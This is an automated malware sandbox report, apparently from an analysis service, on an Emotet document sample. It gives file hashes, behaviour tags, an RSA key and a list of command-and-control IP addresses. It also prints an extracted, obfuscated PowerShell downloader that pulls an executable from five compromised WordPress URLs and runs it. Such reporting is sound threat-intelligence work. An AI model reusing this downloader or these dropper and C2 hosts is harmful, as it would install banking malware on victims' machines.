General

  • Target

    Docs_7f6f469f6981d4a92806d0d3b706e258.47

  • Size

    127KB

  • Sample

    191216-kj834shtp2

  • MD5

    7f6f469f6981d4a92806d0d3b706e258

  • SHA1

    b62ce47650a8cad8dc922fdf54db41e5c2fc0b4c

  • SHA256

    0dfb26cd2eb02c921a9c73c9c5615dfb666cdd33971639d6441eb6893ae2efe1

  • SHA512

    96ab1419ab38bc0958ab7d0d130efda8302f3f07555753882d28ca19fd0f73a5f781fdf617a741503b8b858dec1d182b08c880c48c5875e672462880b600a8bd

Malware Config

Extracted

Language
ps1
Source
1
$Oqojrpmkdzlg='Geusckfeislh';$Sgynadtdzi = '218';$Fsncjfbnouvcw='Vrtgwojhgrqk';$Isveftscymko=$env:userprofile+'\'+$Sgynadtdzi+'.exe';$Ykjzmxgyekpf='Xhhivpxtn';$Pdzvevbhes=.('new-obj'+'e'+'ct') nEt.WebcLiEnT;$Mvcblrhkzozg='https://lilikhendarwati.com/wp-admin/JbdTQoQQ/*http://www.zhangboo.com/wp-admin/lwhcvV/*http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/*https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/*http://apolina.pl/engl/1tuh6ul-gakf89-994/'."s`pLIT"('*');$Jvkhktvtsqj='Klmwnirr';foreach($Mzmqbzjug in $Mvcblrhkzozg){try{$Pdzvevbhes."do`Wnl`OAdfILE"($Mzmqbzjug, $Isveftscymko);$Kykhosxe='Jccvrurtmy';If ((&('Get-'+'I'+'tem') $Isveftscymko)."lEn`Gth" -ge 31454) {[Diagnostics.Process]::"STa`RT"($Isveftscymko);$Dykdageiykrai='Gaulnathjq';break;$Rxfapwcgiepw='Clskviufmldd'}}catch{}}$Kramunnkskce='Dblxnvyhpyvx'
URLs
exe.dropper

https://lilikhendarwati.com/wp-admin/JbdTQoQQ/

exe.dropper

http://www.zhangboo.com/wp-admin/lwhcvV/

exe.dropper

http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/

exe.dropper

https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/

exe.dropper

http://apolina.pl/engl/1tuh6ul-gakf89-994/

Extracted

Family

emotet

Botnet

Epoch3

C2

190.38.252.45:443

105.225.77.21:80

181.167.35.84:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

69.30.205.162:7080

190.161.67.63:80

81.82.247.216:80

72.69.99.47:80

172.90.70.168:443

91.117.31.181:80

200.71.112.158:53

51.77.113.97:8080

190.101.87.170:80

96.234.38.186:8080

190.146.14.143:443

86.70.224.211:80

88.247.26.78:80

175.103.239.50:80

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMqZMACZDzcRXuSnj2OI8LeIYKrbUIXL
3
faUgIJPwYd305HnaBS2AfA0R+oPxT32r+3BbayI3KguqAn3E+rbwtLhqhOXOlTnY
4
7yvG4ufmwCCkRzc6Sq8baToxmd6y523AIQIDAQAB
5
-----END PUBLIC KEY-----
6

Targets

    • Target

      Docs_7f6f469f6981d4a92806d0d3b706e258.47

    • Size

      127KB

    • MD5

      7f6f469f6981d4a92806d0d3b706e258

    • SHA1

      b62ce47650a8cad8dc922fdf54db41e5c2fc0b4c

    • SHA256

      0dfb26cd2eb02c921a9c73c9c5615dfb666cdd33971639d6441eb6893ae2efe1

    • SHA512

      96ab1419ab38bc0958ab7d0d130efda8302f3f07555753882d28ca19fd0f73a5f781fdf617a741503b8b858dec1d182b08c880c48c5875e672462880b600a8bd

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails

    • Executes dropped EXE

    • Windows security modification

    • Checks system information in the registry

      System information is often read in order to detect sandboxing environments.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.